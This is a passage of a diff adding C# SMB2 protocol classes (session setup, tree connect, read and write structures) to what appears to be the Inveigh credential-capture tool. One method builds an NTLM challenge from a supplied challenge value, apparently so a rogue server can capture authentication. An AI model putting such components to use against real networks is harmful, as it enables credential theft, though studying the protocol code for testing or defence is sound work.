EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + enum FileInformationClass : byte + { + FileDirectoryInformation = 0x01, + FileFullDirectoryInformation = 0x02, + FileIdFullDirectoryInformation = 0x26, + FileBothDirectoryInformation = 0x03, + FileIdBothDirectoryInformation = 0x25, + FileNamesInformation = 0x0C + } + + enum QueryDirectoryRequestFlags : byte + { + SMB2_RESTART_SCANS = 0x01, + SMB2_RETURN_SINGLE_ENTRY = 0x02, + SMB2_INDEX_SPECIFIED = 0x04, + SMB2_REOPEN = 0x10 + } + + class SMB2QueryDirectoryRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/10906442-294c-46d3-8515-c277efe1f752 + public ushort StructureSize { get; set; } + public byte FileInformationClass { get; set; } + public byte Flags { get; set; } + public uint FileIndex { get; set; } + public byte[] FileId { get; set; } + public uint FileNameOffset { get; set; } + public uint FileNameLength { get; set; } + public uint OutputBufferLength { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs new file mode 100644 index 0000000..2d06f10 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs @@ -0,0 +1,47 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2QueryDirectoryResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/4f75351b-048c-4a0c-9ea3-addd55a71956 + public ushort StructureSize { get; set; } + public ushort OutputBufferOffset { get; set; } + public uint OutputBufferLength { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs new file mode 100644 index 0000000..27fd68e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs @@ -0,0 +1,54 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2ReadRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/320f04f3-1b28-45cd-aaa1-9e5aed810dca + public ushort StructureSize { get; set; } + public byte Padding { get; set; } + public byte Flags { get; set; } + public uint Length { get; set; } + public ulong Offset { get; set; } + public byte[] Field { get; set; } + public uint MinimumCount { get; set; } + public byte[] Channel { get; set; } + public uint RemainingBytes { get; set; } + public ushort ReadChannelInfoOffset { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs new file mode 100644 index 0000000..dba7f88 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs @@ -0,0 +1,42 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2ReadResponse + { + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs new file mode 100644 index 0000000..62e8ef2 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs @@ -0,0 +1,89 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.IO; + +namespace Quiddity.SMB2 +{ + class SMB2SessionSetupRequest + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a3c2c28-d6b0-48ed-b917-a86b2ca4575f + public ushort StructureSize { get; set; } + public byte Flags { get; set; } + public byte SecurityMode { get; set; } + public byte[] Capabilities { get; set; } + public byte[] Channel { get; set; } + public ushort SecurityBufferOffset { get; set; } + public ushort SecurityBufferLength { get; set; } + public byte[] PreviousSessionId { get; set; } + public byte[] Buffer { get; set; } + + public SMB2SessionSetupRequest() + { + this.StructureSize = 19; + this.Flags = 0x00; + this.SecurityMode = 0x01; + this.Capabilities = new byte[4] { 0x01, 0x00, 0x00, 0x00 }; + this.Channel = new byte[4]; + this.SecurityBufferOffset = 88; + this.SecurityBufferLength = 0; + this.PreviousSessionId = new byte[8]; + this.Buffer = new byte[0]; + } + + public SMB2SessionSetupRequest(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.StructureSize = packetReader.ReadUInt16(); + this.Flags = packetReader.ReadByte(); + this.SecurityMode = packetReader.ReadByte(); + this.Capabilities = packetReader.ReadBytes(4); + this.Channel = packetReader.ReadBytes(4); + this.SecurityBufferOffset = packetReader.ReadUInt16(); + this.SecurityBufferLength = packetReader.ReadUInt16(); + this.PreviousSessionId = packetReader.ReadBytes(8); + this.Buffer = packetReader.ReadBytes(this.SecurityBufferLength); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs new file mode 100644 index 0000000..cff9796 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs @@ -0,0 +1,114 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using Quiddity.NTLM; + +namespace Quiddity.SMB2 +{ + class SMB2SessionSetupResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/0324190f-a31b-4666-9fa9-5c624273a694 + public ushort StructureSize { get; set; } + public ushort SessionFlags { get; set; } + public ushort SecurityBufferOffset { get; set; } + public ushort SecurityBufferLength { get; set; } + public byte[] Buffer { get; set; } + + public SMB2SessionSetupResponse() + { + this.StructureSize = 9; + this.SessionFlags = 0; + this.SecurityBufferOffset = 72; + this.SecurityBufferLength = 0; + this.Buffer = new byte[0]; + } + + public SMB2SessionSetupResponse(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.StructureSize = packetReader.ReadUInt16(); + this.SessionFlags = packetReader.ReadUInt16(); + this.SecurityBufferOffset = packetReader.ReadUInt16(); + this.SecurityBufferLength = packetReader.ReadUInt16(); + this.Buffer = packetReader.ReadBytes(this.SecurityBufferLength); + } + + } + + public byte[] GetBytes() + { + this.SecurityBufferLength = (ushort)Buffer.Length; + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.StructureSize); + packetWriter.Write(this.SessionFlags); + packetWriter.Write(this.SecurityBufferOffset); + packetWriter.Write(this.SecurityBufferLength); + + if (this.SecurityBufferLength > 0) + { + packetWriter.Write(this.Buffer); + } + + return memoryStream.ToArray(); + } + + } + + public void Pack(string challenge, string netBIOSName, string computerName, string dnsDomain, string dnsComputerName, string dnsTreeName, out byte[] challengeData) + { + NTLMChallenge ntlmChallenge = new NTLMChallenge(); + ntlmChallenge.ServerChallenge = ntlmChallenge.Challenge(challenge); + challengeData = ntlmChallenge.ServerChallenge; + byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); + NTLMAVPair ntlmAVPair = new NTLMAVPair(); + ntlmChallenge.Payload = ntlmAVPair.GetBytes(netBIOSName, computerName, dnsDomain, dnsComputerName, dnsTreeName, timestamp); + byte[] ntlmChallengeData = ntlmChallenge.GetBytes(computerName); + byte[] gssapiData = ntlmChallenge.Encode(ntlmChallengeData); + this.SecurityBufferLength = (ushort)gssapiData.Length; + this.Buffer = gssapiData; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs new file mode 100644 index 0000000..5f1ba50 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs @@ -0,0 +1,50 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + + class SMB2TreeConnectRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/832d2130-22e8-4afb-aafd-b30bb0901798 + public ushort StructureSize { get; set; } + public byte[] Flags { get; set; } + public byte[] Reserved { get; set; } + public ushort PathOffset { get; set; } + public ushort PathLength { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs new file mode 100644 index 0000000..6cb9fa4 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs @@ -0,0 +1,88 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + + enum ShareType : byte + { + SMB2_SHARE_TYPE_DISK = 0x01, + SMB2_SHARE_TYPE_PIPE = 0x02, + SMB2_SHARE_TYPE_PRINT = 0x03 + } + + enum ShareFlags : uint + { + SMB2_SHAREFLAG_MANUAL_CACHING = 0x00000000, + SMB2_SHAREFLAG_AUTO_CACHING = 0x00000010, + SMB2_SHAREFLAG_VDO_CACHING = 0x00000020, + SMB2_SHAREFLAG_NO_CACHING = 0x00000030, + SMB2_SHAREFLAG_DFS = 0x00000001, + SMB2_SHAREFLAG_DFS_ROOT = 0x00000002, + SMB2_SHAREFLAG_RESTRICT_EXCLUSIVE_OPENS = 0x00000100, + SMB2_SHAREFLAG_FORCE_SHARED_DELETE = 0x00000200, + SMB2_SHAREFLAG_ALLOW_NAMESPACE_CACHING = 0x00000400, + SMB2_SHAREFLAG_ACCESS_BASED_DIRECTORY_ENUM = 0x00000800, + SMB2_SHAREFLAG_FORCE_LEVELII_OPLOCK = 0x00001000, + SMB2_SHAREFLAG_ENABLE_HASH_V1 = 0x00002000, + SMB2_SHAREFLAG_ENABLE_HASH_V2 = 0x00004000, + SMB2_SHAREFLAG_ENCRYPT_DATA = 0x00008000, + SMB2_SHAREFLAG_IDENTITY_REMOTING = 0x00040000, + SMB2_SHAREFLAG_COMPRESS_DATA = 0x00100000 + } + + enum Capabilities : uint + { + SMB2_SHARE_CAP_DFS = 0x00000008, + SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY = 0x00000010, + SMB2_SHARE_CAP_SCALEOUT = 0x00000020, + SMB2_SHARE_CAP_CLUSTER = 0x00000040, + SMB2_SHARE_CAP_ASYMMETRIC = 0x00000080, + SMB2_SHARE_CAP_REDIRECT_TO_OWNER = 0x00000100 + } + + + class SMB2TreeConnectResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/dd34e26c-a75e-47fa-aab2-6efc27502e96 + public ushort StructureSize { get; set; } + public byte ShareType { get; set; } + public byte Reserved { get; set; } + public uint ShareFlags { get; set; } + public uint Capabilities { get; set; } + public uint MaximalAccess { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs new file mode 100644 index 0000000..8ff07af --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs @@ -0,0 +1,45 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2TreeDisconnectRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/8a622ecb-ffee-41b9-b4c4-83ff2d3aba1b + public ushort StructureSize { get; set; } + public byte[] Reserved { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs new file mode 100644 index 0000000..847e22f --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs @@ -0,0 +1,45 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2TreeDisconnectResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/aeac92de-8db3-48f8-a8b7-bfee28b9fd9e + public ushort StructureSize { get; set; } + public byte[] Reserved { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs new file mode 100644 index 0000000..48ecc63 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs @@ -0,0 +1,68 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 